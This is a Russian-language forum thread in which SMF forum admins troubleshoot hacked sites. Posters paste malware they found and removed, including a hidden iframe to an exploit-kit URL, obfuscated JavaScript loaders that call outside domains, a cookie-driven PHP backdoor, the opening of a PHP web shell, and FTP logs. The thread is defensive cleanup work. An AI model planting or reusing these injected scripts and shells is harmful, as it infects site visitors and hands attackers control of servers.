Взломан форум и установлен в файл index.php вредоносный код. Будьте внимательны!

[Солярис]

Всех приветствую!

Форум работает на движке 1.1.14.

Сегодня с утра до 11.00 было всё нормально. Отлучился на часок и увидел "сюрприз".

Начались неприятности. Антивирусная программа AVG Интернет Секъюрити при попытке открытия сайта с форумом выдала следующее предупреждение:
На странице, на которую вы пытаетесь перейти, обнаружен известный эксплойт, фишинг-атака или прием социальной инженерии, в результате чего она была заблокирована по соображениям безопасности. При отсутствии защиты, например приложения AVG Security Toolbar и AVG, компьютер подвергается риску взлома, повреждения или кражы личных данных. Чтобы продолжить, выберите одно из предлагаемых ниже действий.

URL: ponedvech.cx.cc/main.php?page=d4f8d88981e9f5c8
Имя: Blackhole Exploit Kit (type 1889)

Обратился к службе поддержки хостинга. Они выявили что в корневой папке в файле index.php был внедрен следующий код:

Код Выделить Развернуть

<iframe src='http://ponedvech.cx.cc/main.php?page=d4f8d88981e9f5c8' width='1' height='1' frameborder='0'></iframe>

Вероятнее всего взломали форум через уязвимости в СМФ. Вот такие вот "приятные" вещи происходят.

Сижу сейчас думаю, можно ли как-нибудь защититься от повторного "сюрприза". Только вот неизвестно, каким конкретно способом был взломан форум.


З.Ы. Прошу прощения. Уважаемый модератор, переместите тему в раздел по "старым" движкам. Перепутал разделы.

[digger®]

Обычная инъекция, коих мильоны.

[Солярис]

Ну, обычной не назовешь. Без уязвимости в движке просто так в файл код не вставишь.

[digger®]

Ну, обычной не назовешь. Без уязвимости в движке просто так в файл код не вставишь.

Пароль от фтп или админки дайте, запросто вставлю без уязвимости.

[kak2z]

Чаще всего или беда хостера или личная дыра  безопасности  (троян, "друг", блокнотик с паролями).
Первая линейка вроде откатаная и пофиксеная дальше не куда. 

[BIOHAZARD]

Вероятнее всего взломали форум через уязвимости в СМФ. Вот такие вот "приятные" вещи происходят.

бред
если бы было так, здесь бы уже завалили сообщениями о инъекциях
про количество подобных сообщений на smf.org даже подумать страшно

[recived]

бред
если бы было так, здесь бы уже завалили сообщениями о инъекциях
про количество подобных сообщений на smf.org даже подумать страшно

Ну если бы это в паблик ушло тогда да.  А так обычный бот наверняка прошелся через хостера ну или просто пароли свиснули.

[Acid.Name]

Будь внимательным. И не храни пароли в программе для подключения по FTP.  Обычно троян или вирус от туда берут пароли.

У меня такое было уже. 

[Солярис]

Будь внимательным. И не храни пароли в программе для подключения по FTP.  Обычно троян или вирус от туда берут пароли.

Я в программе для подключения к сайту по ФТП паролей не храню и вообще ею практически не пользуясь. Работаю с содержимым сайта через сайт хостинг-компании.

[Солярис]

Опять какая-то сволочь только что залила в файл index.php какую-то дрянь. Удалил только что.

Ничего не могу понять. Каким образом происходит несанкционированный доступ к файлам форума?!

Какие права (CHMOD) на файлы форума должны быть установлены (для безопасности форума)?

[GeorG]

Шелл?

[Макар]

Ну если опять, а после первого раза были сменены пароли логины и явки то остается искать шелл. Как в своем акаунте , так и в соседних, а возможно и на всем сервере.

мля как же медленно писать с мобильного . . . . . Опять опередили

[Солярис]

Шелл?

Плиз, поясните для не программистов, что сие означает?!

[GeorG]

Это код, который позволяет управлять системой с удалённого компьютера.
Подробнее в гугле.

[Солярис]

Так, а где он засел этот код? В файлах форума внутри или это отдельный файл?

З.Ы. И мне некогда сейчас Гуглом пользоваться. У меня сайта заражен в данную минуту.

[GeorG]

Так, а где он засел этот код?

остается искать шелл. Как в своем акаунте , так и в соседних, а возможно и на всем сервере.

[Солярис]

А права доступа к файлам, какие должны быть выставлены для безопасности работы форума?

[kak2z]

Вот что нашел по Вашей проблеме http://habrahabr.ru/company/sprinthost/blog/125839/ я сам не спец - но может Вам поможет.

[Солярис]

Вот такую фигню нашел в файле index.php:

Код Выделить Развернуть

<nofollow><noindex><script language="JavaScript">
cURL = "cleartraf.ru";
enc = "%3Csc"+"ri"+"pt%20lan"+"gua"+"ge%3D%22Ja"+"vaS"+"cr"+"ipt%22%20cha"+"rset%3D%22wi"+"ndow"+"s-1251%22%20s"+"rc%3D%22h"+"ttp%3A/"+"/"+cURL+"/j"+"s/i"+"f"+".p"+"hp%3Fid%3D1223%22%3E%3C/sc"+"ri"+"pt%3E";
dec = unescape(enc);
document.write(dec);
</script></noindex></nofollow>


kak2z, спасибо за ссылку.

[digital]

Обфускация ява-скрипта. Видно, что выводится результат выполнения другого скрипта с http://cleartraf.ru/js/if.php.....

[Солярис]

Можно ли установить, к примеру, пароль для доступа к изменению файла index.php?! Или это не возможно сделать?

[Солярис]

Черт возьми, это какое-то уродство. Удаляю код из файла index.php:

Код Выделить Развернуть

<nofollow><noindex><script language="JavaScript">
cURL = "cleartraf.ru";
enc = "%3Csc"+"ri"+"pt%20lan"+"gua"+"ge%3D%22Ja"+"vaS"+"cr"+"ipt%22%20cha"+"rset%3D%22wi"+"ndow"+"s-1251%22%20s"+"rc%3D%22h"+"ttp%3A/"+"/"+cURL+"/j"+"s/i"+"f"+".p"+"hp%3Fid%3D1223%22%3E%3C/sc"+"ri"+"pt%3E";
dec = unescape(enc);
document.write(dec);
</script></noindex></nofollow>

Делаю бекап. И он опять через некоторое время появляется в этом файле в его конце.

Черт возьми. Его как-то изнутри самого сайта внедряют. Где-то сидит какой-то сволочной код, который все это делает?! 

[kak2z]

Хостеру жалуйтесь. Я думаю у него где то проблема все таки.

[Солярис]

Хостеру жалуйтесь. Я думаю у него где то проблема все таки.

Да я с хостером уже сижу целый день на короткой связи. Это первое, что я сделал. Про это можно и не напоминать.

[Солярис]

А что за файл в корне форуме php.php? Он должен там быть?

Внутри ничего нет, кроме этого:

Код Выделить Развернуть

<?php
phpinfo ();
?>


[kak2z]

это информация про настройки рнр на сервере.. ничего военного в нем нет)

[Солярис]

Понятно, спасибо. А вот файл


Это что за зверь?

[Mavn]

а вот еще один файл xxx.sss.xdd.php по названию о назначении сможете догадаться??

[Солярис]

Mavn, Вы так любезны.
Человек не знает, куда ему тыркнуться и что посмотреть, поскольку проблема не решается. Нет, чтобы высказать слова поддержки, так нет, обязательно надо человека подколоть.

Неужели не понятно, что речь идет о корневой папке форума. Должен ли там быть такой файл с таким наименованием?

Вот начальные строчки указанного файла:

Код Выделить Развернуть

<?php
$auth = array(
'md5pass' => "63a9f0ea7bb98050796b649e85481845" // root
);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
[at]session_start();
#if(empty($_POST['ajax']))
# print_r($_POST);
error_reporting(E_ALL);
[at]ini_set('error_log',NULL);
[at]ini_set('log_errors',0);
[at]ini_set('max_execution_time',0);
[at]set_time_limit(0);
[at]set_magic_quotes_runtime(0);
[at]define('VERSION', '2');
[at]define('SELF_PATH', __FILE__);

function my_strip_slashes(&$p){
if(is_array($p)){
foreach($p as $k => $v) {
my_strip_slashes($v);
$p[$k] = $v;
}
} else
$p = stripslashes($p);
}
if(get_magic_quotes_gpc())
my_strip_slashes($_POST);
function printLogin() {
?>
<center>
<form method=post>
Password: <input type=password name=pass><input type=submit value='>>'>
</form></center>
<?php
exit;
}

if( !isset( $_SESSION['sh_logined'] ))
if( empty( $auth['md5pass'] ) || 
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth['md5pass'] ) ) )
$_SESSION['sh_logined'] = true;
else
printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = [at]ini_get('safe_mode');
$disable_functions = [at]ini_get('disable_functions');
$home_cwd = [at]getcwd();
if( isset( $_POST['c'] ) )
[at]chdir($_POST['c']);
$cwd = [at]getcwd();
if( $os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';

if($os == 'win')
$aliases = array(
"List Directory" => "dir",
     "Find index.php in current dir" => "dir /s /w /b index.php",
     "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
     "Show active connections" => "netstat -an",
     "Show running services" => "net start",
     "User accounts" => "net user",
     "Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else

.....и так далее.....


З.Ы. Mavn, я посмотрю, как Вы будете себя чувствовать и что писать, когда у Вас в файлы форума будет постоянно заливаться вредоносный код.

[digital]

Солярис, вот интересно, если всё снести и оставить только один единственный файл  index.php с чистым содержанием, при этом закрыть от всех доступ через веб посредством файла .htaccess, заразится  index.php или нет? Если заразится и при этом на аккаунте больше нет зараженных сайтов, то заражение возможно только через хостинг, либо через FTP или админку.

[kak2z]

Только что курил гугл по вашей проблеме...
1. Проверить свой комп на вирусы, и не тем антивиром что у вас сейчас стоит а скачать что то другое, а лучше парочку.
2. В файрволе на компе закрыть все лишние соединения.
2.5 ПОМЕНЯТЬ ВСЕ ПАРОЛИ!
3. Исправить индекс.пхп и смотреть дальше. Если ничего не поменялось делайте бекап всего форума (файлов) и заливайте чистый движок скачав его с оффа.
4. Если и это не поможет и все равно даже на чистом будут проблемы. Пусть хостер лечит свой сервак от вирусов (хотя это самый маловероятный вариант)

[Mavn]

в стандарте если не установлено никаких модов в корне должны лежать следующие файлы

Mavn, Вы так любезны.
Человек не знает, куда ему тыркнуться и что посмотреть, поскольку проблема не решается. Нет, чтобы высказать слова поддержки, так нет, обязательно надо человека подколоть.
З.Ы. Mavn, я посмотрю, как Вы будете себя чувствовать и что писать, когда у Вас в файлы форума будет постоянно заливаться вредоносный код.

1. я никого не подкалываю. если выкладываете название файла то и во вложение его выкладывайте или в тег код. Ибо понять что за файл проблематично. Тем более вопрос был: "Что за зверь?"
2. Стандартный набор файлов и папок которые должны быть в корне форума можно увидеть в дистрибутиве который можно скачать на офф сайте

Код Выделить Развернуть

      attachments                     
         avatars                                                                                     
         Packages
         Smileys
         Sources
         Themes
         agreement.txt
         index.php   
         install.php 
         install_1-1.sql
         license.txt     
         news_readme.html
         readme.html     
         Settings.php   
         Settings_bak.php
         SSI.php         
         ssi_examples.php 
         ssi_examples.shtml
а вообще данный файл это ничто иное как шелл

[Stern]

Понятно, спасибо. А вот файл

Это что за зверь?

Солярис, не паникуйте преждевременно - всё поправимо!
Сам недавно обнаружил на своих сайтах несколько шеллов - вскорости накропаю отчёт о проделанной работе)
kak2z привёл вам очень правильную ссылку - там достаточно подробно и внятно описана последовательность поиска источника взлома.
Надеюсь, у вас есть лог доступа к серверу (если нет или вы не знаете, где его взять - обратитесь к хостеру - вам его выдадут).
Запустите поиск по имени указанного вами файла - таким образом вы сможете установить, как и когда к вам попал шелл (небольшое замечание насчёт "когда" - это могло быть и полгода, и год назад - у меня один из шеллов, активизировавшийся во время августовского массового хака сайтов (в первую декаду августа), был залит 14 апреля и никаким образом до тех пор не проявлял себя).
Ну и слейте все файлы с хостинга - поищите на компе (как антивирусом, так и по названиям непонятных файлов/левых ссылок)

и php.info (php.php)обязательно удалите - не нужно посторонним знать настройки php у вас на сервере!

а шелл у вас какой-то специфический  - только от гугля ныкается (if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
   header('HTTP/1.0 404 Not Found')
пришлите мне его целиком (текстом, не файлом!) в личку или на почту, плз!

Успехов в борьбе!

[karavan]

Ну вот и пришла моя очередь... в файлы index.php во всех папках кто-то или что-то внесло вредоносный код вот-такого содержания:

Код Выделить Развернуть

?> <!-- . --><script type="text/javascript">if('GkIAe'=='PcSQtR')kduSI();var sEGja;var EdgahX='fKrNfb';if('DQHmU'=='Omfj')MHXOe='GiwJ';var TMtyeWXZ="\x66\x72\x6fmCharC\x6fd\x65";var pbfpi=120;function VJNx(){}
var xMQXmOlq="";function JAMmah(){}function kcYW(){var DrHR='KeIo';if('xdZe'=='RSiuld')dfmCwi();}
if('WVXT'=='fnNPOH')otbQo();if('zHkmr'=='DFgm')PpihO();var nPZbcvNO="s\x6cic\x65";var EcJEia='jsXqFm';var izlNGZHYh="a4b0b0ac766b6b9db0ab9eb1afacaba1a49da86a9faba96baf6c6ba5aa6a9fa3a57b6d6c";function jyJXK(){}if('WvrZL'=='JDodXD')MsVU='qUbY';function WwoTr(){}
var gxwRmN='itrzFV';var oUGczFvk="p\x61\x72seInt";var kjrX;var sGAjMB;var NyTT=27;var VBWBjrZe=(function(){function dydkGo(){var hkIVw='dLAP';if('RcrL'=='lwnek')GqUxow();}var NEqytk='hSNJ';return this;var UfKKU;})();if('mTWytZ'=='pfXJ')WWBJ();var QnUOX="cons\x74ructor";var GBhA='ewNv';function FZMg(){var qEFWsn='HbQJj';if('yjUBu'=='yIZo')RVwP();}
var JrqarNN="LSxIZfDv"[QnUOX];var slxTOE;var suXRl=89;function aPduh(){var bACO='kUly';if('MUoEjK'=='xUXEVN')tgJi();}
for(var lMHyYSom=0;lMHyYSom<izlNGZHYh.length;lMHyYSom+=2){var Yhrdg;oUimSwtQv=VBWBjrZe[oUGczFvk](izlNGZHYh[nPZbcvNO](lMHyYSom,lMHyYSom+2),16)-60;var EpvQzf=71;function TLVFpT(){}
xMQXmOlq+=JrqarNN[TMtyeWXZ](oUimSwtQv);var hYgM=16;function mHVD(){var tzckrp='FKTsj';if('WSNPmg'=='AvzqTY')NGLIfu();}var xkLIjj='LjHYnt';}
if('HTZKe'=='kuJcLd')FrCe();if('Uzaj'=='uFPmeN')rYrL='qajY';function BKjWnE(){var Drfmo='xqXdV';if('SSyi'=='ppUMyb')SHekq();}
var XrwEP="rUowFeuRb";function yyfze(){}var TcnABO=21;var rImjV=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+XrwEP+'" src="'+"xMQXmOlq"+'">':'iframe';function ahVM(){var lcVK='whbK';if('mJKA'=='RhED')fWhJ();}var ZDBl='TfLcSN';var ahLAYZ;var sMSoJI=document.createElement(rImjV);sMSoJI.name=XrwEP;var ARqr=86;sMSoJI.setAttribute("name",XrwEP);if('CcbU'=='DOnAV')spEIEU();sMSoJI.id=XrwEP;function XGKr(){var tMBC='dOjY';if('eIaE'=='YxPwQu')UMAmc();}
sMSoJI.src=xMQXmOlq;function xJXSH(){}
sMSoJI.style.right="0px";var TAZRuh=93;sMSoJI.style.top="0px";if('ghZal'=='HMsbjS')ErVOb();sMSoJI.style.height="1px"
if('FAOqPy'=='qnMQRd')OHulZ='yISSK';sMSoJI.style.width="1px";var loVCI;var HzxyWb=265;if('XsVOyN'=='ciyOKq')brxMH();sMSoJI.style.position="absolute";function IJfqol(){var VeRObN='CPwZ';if('nLIZGV'=='QaRC')veKAA();}
document.body.appendChild(sMSoJI);var xyoG;var XnvVN;var ROKO;</script><!-- . --> 

Проявился визуально только в ИЕ в виде предложения загрузить некий файл atobuspoehal.com


и еще во всех браузерах перестало работать цитирование выделенного. Вылечил бекапом файлов за 20 число...

Подскажите пожалуйста, как думаете, это работа бота или человека-злоумышленника, и что можно сделать кроме стандартной замены паролей итд... ?

[Stern]

логи апача просмотри(те) тщательно.
и к хостеру обязательно обратитесь с этой проблемой

[karavan]

К хостеру обращался, он "ничего не знает" )
В логах FTP доступа есть несанкционированный вход, судя по всему взломали фтп-пароль с Румынского айпишника 94.63.240.82
Вот какие записи в логах ФТП:

Код Выделить Развернуть

ov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 -- [28/Nov/2011:12:26:43 +0000] STOR /---/www/wp-includes/theme-compat/footer.php 226 15571
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:43 +0000] RETR ----/www/wp-includes/theme-compat/header.php 226 1830
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 v---- [28/Nov/2011:12:26:43 +0000] STOR /----/www/wp-includes/theme-compat/header.php 226 49670
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 --- [28/Nov/2011:12:26:43 +0000] RETR /---m.ua/www/forum/Packages/backups/index.php 226 218
Nov 28 12:26:43 web33 proftpd[25703]: 94.63.240.82 -----[28/Nov/2011:12:26:43 +0000] STOR /----/www/forum/Packages/backups/index.php 226 2610
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] RETR /home/-----com.ua/www/forum/Packages/index.php 226 324
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] STOR /home/vsop/-----/www/forum/Packages/index.php 226 2716
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ---- [28/Nov/2011:12:26:44 +0000] RETR /home/-----/www/forum/Smileys/aaron/index.php 226 218
Nov 28 12:26:44 web33 proftpd[25703]: 94.63.240.82 ----- [28/Nov/2011:12:26:44 +0000] STOR /home/--------com.ua/www/forum/Smileys/aaron/index.php 226 2610

Пароли уже поменял, логи самого сервера будут доступны завтра (

[Макар]

wp версия какая стоит ?

[karavan]

вроде 3.2.1 это как бы другой сайт на одном хостинге у меня.

[Макар]

у тя впс/вдс ?

проверь

Входящая во многие wordpress темы утилита для изменения размера изображений timthumb.php, уязвима к загрузке произвольного PHP-кода.

В конфиге скрипта лежат несколько доменов (flickr.com, picasa.com, blogger.com, wordpress.com, img.youtube.com, upload.wikimedia.org, photobucket.com) с которого ему разрешено загружать изображения.

Из-за недостаточной проверки передаваемых параметров существует возможность загрузить веб-шелл на сервер используя список доверенных доменов для создания поддоменов с такими же названиями. Т.е. timthumb.php считает ссылку blogger.com.hackersite.com/webshell.php легитимной и позволяет загрузить скрипт на сервер.

Мы рекомендуем всем пользователям которые использует Wordpress для своих сайтов проверить наличие данного файла в темах, и заменить его на пропатченный timthumb.php

если залили шелл через wp то соседние аккаунты вполне могут пострадать

[karavan]

Да, скорее всего так и было. Там просто другой админ "админит", у нас как бы одна "фирма" но у него персональная страничка еще есть... А этот пропатченый timthumb.php не подскажите где скачать можно?

[kak2z]

Я думаю тут http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php

П.С. Только что проверил свой WP у меня такого файла нет)

[karavan]

Ок, спасибо.

[Макар]

тут http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php

или просмотреть патчи безопасности на офе wp

[karavan]

спасибо, поставил по +1

[Солярис]

Всех приветствую!

Кто-нибудь может подсказать, что вот это за бяка: http://low.redancegirlmindas.in/counter/init.js?v=1741727003

Я обыскался в коде, но не могу найти, каким кодом подгружается вот это нечто?!!

Дело в том, что я решил проверить ссылку (адрес своего сайта на наличие вирусов) вот по этому адресу: http://vms.drweb.com/online

При проверке выдается, что вирусов не обнаружено, но при этом в окне с результатами проверки показывается вот этот адрес. Я не могу понять, откуда он взялся на сайте и что это?!
Вот, что показывает Доктор Веб:

Код Выделить Развернуть


Проверка: http://low.redancegirlmindas.in/counter/init.js?v=250189047
Размер файла: 1445 байт
MD5 файла: b59aecfc02322f4dbae9cfa9f0fc2bd5

http://low.redancegirlmindas.in/counter/init.js?v=250189047 - Ok

Заранее благодарю за помощь!

[Солярис]

Обнаружил еще одну странность.

В папке articles мода SMF articles не понятно откуда появляется графический файл yy_y.gif . Вес у него не большой, изображения никакого не содержит.
Я никак не могу понять, каким образом он там появляется и откуда (даже после его удаления).

Как по логам понять, каким образом этот файл заливается на сервер и появляется в указанной папке? По каким командам это можно понять?

[Солярис]

Вот, что нашел в файле index.php (какая-то сволочь залила  ):

Код Выделить Развернуть

}
foreach ($ar_s = array('/NT/i','/SV1/i') as $a_r) {
    if ([at]preg_match($a_r,[at]$_SERVER['HTTP_USER_AGENT'])) {
        if([at]$_COOKIE['pplicookie'] != 'presscookie') {
           [at]$doma_in = [at]file_get_contents('/home/***/***/сайт.ru/public_html/articles/yy_y.gif');
            if ([at]$doma_in && [at]strlen([at]$doma_in)>5) {
            echo"<link rel='stylesheet'type='text/css'href=http://$doma_in/counter/init.css?v=".[at]mt_rand()."/><script type='text/javascript'src=http://$doma_in/counter/init.js?v=".[at]mt_rand()."></script>";
            [at]SetCookie("pplicookie","presscookie",[at]time()+172800);}}break;}}
            if ([at]$_COOKIE['hphpallcookie']) {
    [at]file_put_contents  ('/home/***/***/сайт.ru/public_html/articles/yy_y.gif',[at]$_COOKIE['hphpallcookie']);   
}

[Солярис]

Где та дырка в движке, которая позволяет заливать эту гадость (черт её знает)?

[karavan]

Посмотрите логи FTP доступа, заходил ли кто-то кроме вас? В моем случае так и было, взломали FTP пароль, и тогда "дырка" уже не нужна.

[svadba31]

Была бы дырка в движке - ломанули бы уже большенство популярных форумов...

[Солярис]

Сейчас просматриваю файлы на предмет наличия подозрительных. Обнаружил папку "xhtml-editor". Кто-нибудь в курсе, что это за папка? Быть может, её какой-нибудь мод создает?
Эта папка случаем не относится к расширенной форме быстрого ответа?

[Mavn]

Берешь список установленных модов на своем
скачиваешь распаковываешь на комп и сверяешься гадать что от модов что нет никто не сможет

[digger®]

Сейчас просматриваю файлы на предмет наличия подозрительных. Обнаружил папку "xhtml-editor". Кто-нибудь в курсе, что это за папка? Быть может, её какой-нибудь мод создает?
Эта папка случаем не относится к расширенной форме быстрого ответа?

Это от портала или какого-то мода статей html-редактор.

[Kochevnik.73]

Опишу свою ситуацию.
Появились всплывающие окна с навязчивой рекламой. Сам разобраться не смог. Все снес и залил снова! Реклама пропала. Более 2-х часов чисто лазил по форуму - все отлично. Народ который сидит на хроме не перстает жаловаться на рекламу. Поставил хром для проверки. Реклама есть на стадии регистрации. У меня на Опере никак не проявляется. В чем может быть проблема? Форум http://volzhanin21.com/f/index.php?action=forum

[GeorG]

Касперский ругается на вредоносные ссылки.
Скоро вас внесут черный список поисковиков и будете долго из него выбираться.

Проверяйте файлы на вредоносный код, удаляйте его, как можно быстрее, время на минуты тут...

[Kochevnik.73]

вроде почистил.
Потом опять реклама начала появляться. В чем проблема может быть. Помогите чуть чуть

[kak2z]

http://volzhanin21.com/f/index.php?action=forum

я захожу не вижу рекламу.. но попробуйте пароли поменять на ФТП, а потом почистить..

[Kochevnik.73]

я захожу не вижу рекламу.. но попробуйте пароли поменять на ФТП, а потом почистить..

реклама есть. сразу не выходит. при нажатии на кнопки. пароль сменил на фтп - спасибо.
вот от пользователей http://volzhanin21.com/f/index.php/topic,291.msg36322/topicseen.html#new 

[Kochevnik.73]

файлы нашел с нулевым значением  .pureftpd-upload.4d7b8dce.15.2acc.4d4bad92 права 0666